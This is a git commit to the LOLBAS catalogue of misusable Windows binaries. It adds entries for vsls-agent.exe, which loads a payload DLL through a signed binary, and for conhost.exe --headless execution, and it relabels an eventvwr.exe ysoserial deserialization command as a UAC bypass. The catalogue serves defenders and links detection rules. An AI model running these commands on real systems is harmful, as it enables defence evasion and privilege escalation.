Add vsls-agent lolbin and committing a few other changes (#263)

Co-authored-by: Wietze <wietze@users.noreply.github.com>

NOTICE.md

@@ -14,7 +14,7 @@
 
 * Submitter: An individual, group, organization, or entity that contributes to the LOLBAS project through project maintenance, issue submission, Pull Request (PR) submission, etc.
 * Consumer: An individual, group, organization, or entity that uses ("consumes") the LOLBAS project resources through the web portal or repository interfaces and capabilities.
-* OLBAS: Living Off The Land Binaries and Scripts
+* LOLBAS: Living Off The Land Binaries and Scripts
 * LOLBIN: Living Off The Land Binary
 * LOL/"lol": Living Off The Land
 

README.md

@@ -72,6 +72,7 @@ The following folks help maintain the LOLBAS Project on their personal time:
 * Chris 'Lopi' Spehn ([@ConsciousHacker](https://twitter.com/ConsciousHacker))
 * Liam ([@liamsomerville](https://twitter.com/liamsomerville))
 * Wietze ([@Wietze](https://twitter.com/@Wietze))
+* Jose Hernandez ([@_josehelps](https://twitter.com/_josehelps))
 
 ## Thanks
 

yml/OSBinaries/Conhost.yml

@@ -11,6 +11,13 @@ Commands:
     Privileges: User
     MitreID: T1202
     OperatingSystem: Windows 10, Windows 11
+  - Command: "conhost.exe --headless calc.exe"
+    Description: Execute calc.exe with conhost.exe as parent process
+    Usecase: Specify --headless parameter to hide child process window (if applicable)
+    Category: Execute
+    Privileges: User
+    MitreID: T1202
+    OperatingSystem: Windows 10, Windows 11
 Full_Path:
   - Path: c:\windows\system32\conhost.exe
 Detection:
@@ -19,6 +26,8 @@ Detection:
 Resources:
   - Link: https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/
   - Link: https://twitter.com/Wietze/status/1511397781159751680
+  - Link: https://twitter.com/embee_research/status/1559410767564181504
+  - Link: https://twitter.com/ankit_anubhav/status/1561683123816972288
 Acknowledgement:
   - Person: Adam
     Handle: '@hexacorn'

yml/OSBinaries/Eventvwr.yml

@@ -14,9 +14,9 @@ Commands:
   - Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
     Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
     Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
-    Category: Execute
+    Category: UAC Bypass
     Privileges: Administrator
-    MitreID: T1202
+    MitreID: T1548.002
     OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\eventvwr.exe

yml/OtherMSBinaries/vsls-agent.yml

@@ -0,0 +1,22 @@
+---
+Name: vsls-agent.exe
+Description: Agent for Visual Studio Live Share (Code Collaboration)
+Author: Jimmy (@bohops)
+Created: 2022-11-01
+Commands:
+  - Command: vsls-agent.exe --agentExtensionPath c:\path\to\payload.dll
+    Description: Load a library payload using the --agentExtensionPath parameter (32-bit)
+    Usecase: Execute proxied payload with Microsoft signed binary
+    Category: Execute
+    Privileges: User
+    MitreID: T1218
+    OperatingSystem: Windows 10 21H2 (likely previous and newer versions with modern versions of Visual Studio installed)
+Full_Path:
+  - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\Extensions\Microsoft\LiveShare\Agent\vsls-agent.exe
+Detection:
+  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_vslsagent_agentextensionpath_load.yml
+Resources:
+  - Link: https://twitter.com/bohops/status/1583916360404729857
+Acknowledgement:
+  - Person: Jimmy
+    Handle: '@bohops'